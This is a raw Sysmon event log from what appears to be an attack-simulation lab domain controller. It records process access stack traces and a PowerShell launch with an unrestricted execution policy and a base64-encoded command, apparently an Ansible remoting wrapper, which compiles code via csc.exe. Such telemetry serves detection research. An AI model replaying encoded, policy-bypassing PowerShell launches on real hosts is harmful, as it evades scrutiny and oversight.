13:54:46.890{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005939Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.890{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005938Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.890{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005937Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.890{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005936Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.875{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005935Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.875{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005934Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.875{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85A6-5FCF-F500-000000009101}4520C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005933Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.875{10ACEC4A-85A6-5FCF-F300-000000009101}46364256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A6-5FCF-F500-000000009101}4520C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF81927B7BF) 154100x80000000000000005932Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.889{10ACEC4A-85A6-5FCF-F500-000000009101}4520C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\wvfmwfmg.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000005931Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.875{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\wvfmwfmg.cmdline2020-12-08 13:54:46.875 11241100x80000000000000005930Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:46.875{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\wvfmwfmg.dll2020-12-08 13:54:46.875 10341000x80000000000000005929Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.406{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A6-5FCF-F400-000000009101}4552C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005928Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.406{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005927Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.406{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005926Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.406{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005925Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.406{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005924Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.406{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005923Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.406{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005922Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.406{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005921Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.406{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005920Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.406{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85A6-5FCF-F400-000000009101}4552C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005919Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.406{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005918Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.406{10ACEC4A-85A6-5FCF-F300-000000009101}46364256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A6-5FCF-F400-000000009101}4552C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66db258b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662139fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66271ecb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66255530(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+662553c1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66247346(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253879(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+6625346c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66253195(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66252e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66d0474b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66239cc7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+66239297(wow64) 154100x80000000000000005917Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 